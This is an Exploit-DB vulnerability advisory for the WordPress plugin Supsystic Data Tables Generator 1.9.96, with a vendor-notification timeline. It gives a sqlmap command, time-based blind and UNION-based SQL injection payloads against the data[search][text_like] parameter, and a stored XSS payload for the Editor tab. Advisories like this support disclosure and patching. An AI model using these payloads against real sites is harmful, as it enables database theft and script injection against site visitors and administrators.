WordPress Plugin Supsystic Data Tables Generator 1.9.96 – Multiple Vulnerabilities

  • 作者: Erik David Martin
    日期: 2021-02-08
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/49543/
  • # Exploit Title: WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities
    # Date: 24/07/2020
    # Exploit Author: Erik David Martin
    # Vendor Homepage: https://supsystic.com/
    # Software Link: https://downloads.wordpress.org/plugin/data-tables-generator-by-supsystic.1.9.96.zip
    # Category: Web Application
    # Version: 1.9.96
    # Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
    # 25/07 2020: Vendor notified
    # 27/07 2020: Vendor requested detailed information
    # 27/07 2020: Information provided
    # 07/08 2020: Nudged vendor. No reply
    # 22/08 2020: Nudged vendor. No reply
    # 04/10 2020: Nudged vendor. No reply
    # 29/11 2020: WordPress Plugin Security team contacted
    # 08/12 2020: Vulnerability fixed
    # 1. Description
    The POST parameter "data[search][text_like]" does not sanitize user input when searching for data.
    # 2. Proof of Concept (PoC)
    Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
    sqlmap -r request.txt --dbms=mysql -p data[search][text_like]
    Parameter: data[search][text_like] (POST)
    	Type: time-based blind
    	Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' AND (SELECT 4736 FROM (SELECT(SLEEP(5)))iAJy) AND 'iAVl'='iAVl&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables
    	Type: UNION query
    	Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' UNION ALL SELECT CONCAT(0x7170707871,0x487a436e5175474a64617446465349535248737249775445424671545a557367704b61424e6d6545,0x7178786b71),NULL-- -&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables
    			Stored XSS
    # 1. Description
    The "Editor" tab under the "Tables" section is vulnerable to stored XSS. It is possible to store XSS in all input fields as the code does not sanitize any of the user input.
    # 2. Proof of Concept (PoC)
    Enter the following payload into any input field:	"><script>alert(1)</script><!--'
    The payload is stored in the document and executes whenever a user visits the "Settings" tab or the document itself.
    The document is also cached by the plugin. Therefore, the payload can also be executed by any unauthenticated user visting[YOUR TABLE NUMBER]